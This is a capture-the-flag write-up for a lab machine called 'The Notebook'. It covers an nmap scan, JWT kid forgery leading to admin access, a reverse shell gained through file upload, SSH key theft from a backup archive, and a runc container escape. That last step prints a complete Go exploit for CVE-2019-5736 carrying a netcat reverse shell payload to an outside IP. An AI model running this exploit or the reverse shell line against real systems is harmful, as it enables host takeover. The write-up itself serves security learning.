Nmap scan report for 10.10.10.230
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 25 12:11:33 2021 -- 1 IP address (1 host up) scanned in 55.36 seconds
Let's navigate to port 80 as usual
If we click register, we will able to register
After register we will see a page like this
After poking around, we can see there is a jwt authentication token at cookie. By using cookie editor, we can see something like this.
We need to change the localhost from the kid parameter to our IP address so they know where to find the privKey.key file to validate the token authentication.
We first open a listener and paste the generated token to the cookie editor.
And then walla, got an Admin Panel
From the admin panel, we are able to upload files
Reverse Shell
Then we proceed to uplaod a reverse shell file
After uploaded the reverse shell file, we will see this
We can proceed to start a listener and grab a reverse shell by clicking the view
User Shell Escalation
After some digging, we can see this home.tar.gz file under /var/backups
We can proceed to netcat the file back to our machine and extract it.
After extracted, we will get a home directory
Got an id_rsa file ! Finally we can login as user noah
Privilege Escalation
We can see there is a command we can execute using sudo.
We can see the version of the docker by supplying docker --version
This version of docker actually vulnerable to Docker escape--runc container escape vulnerability (CVE-2019-5731)
By researching, we can find this github where it teaches the PoC how to exploit the docker.
After supplying this command, we can get a root container
What we need to do is to modify the exploit given by the PoC
package main
// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
"fmt"
"io/ioutil"
"os"
"strconv"
"strings"
)
// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.31 6666 >/tmp/f"
func main() {
// First we overwrite /bin/sh with the /proc/self/exe interpreter path
fd, err := os.Create("/bin/sh")
if err != nil {
fmt.Println(err)
return
}
fmt.Fprintln(fd, "#!/proc/self/exe")
err = fd.Close()
if err != nil {
fmt.Println(err)
return
}
fmt.Println("[+] Overwritten /bin/sh successfully")
// Loop through all processes to find one whose cmdline includes runcinit
// This will be the process created by runc
var found int
for found == 0 {
pids, err := ioutil.ReadDir("/proc")
if err != nil {
fmt.Println(err)
return
}
for _, f := range pids {
fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
fstring := string(fbytes)
if strings.Contains(fstring, "runc") {
fmt.Println("[+] Found the PID:", f.Name())
found, err = strconv.Atoi(f.Name())
if err != nil {
fmt.Println(err)
return
}
}
}
}
// We will use the pid to get a file handle for runc on the host.
var handleFd = -1
for handleFd == -1 {
// Note, you do not need to use the O_PATH flag for the exploit to work.
handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
if int(handle.Fd()) > 0 {
handleFd = int(handle.Fd())
}
}
fmt.Println("[+] Successfully got the file handle")
// Now that we have the file handle, lets write to the runc binary and overwrite it
// It will maintain it's executable flag
for {
writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
if int(writeHandle.Fd()) > 0 {
fmt.Println("[+] Successfully got write handle", writeHandle)
writeHandle.Write([]byte(payload))
return
}
}
}
Then, we can build it using go command
go build <filename>
We can then send it to the victim machine
We then need to run the script, and during the running state when showing Overwritten /bin/sh successfully, we need to have another terminal at the same time running another command
Then we need to fire up our netcat listener before the process of exploiting and when the command is sent, we will get the shell back.
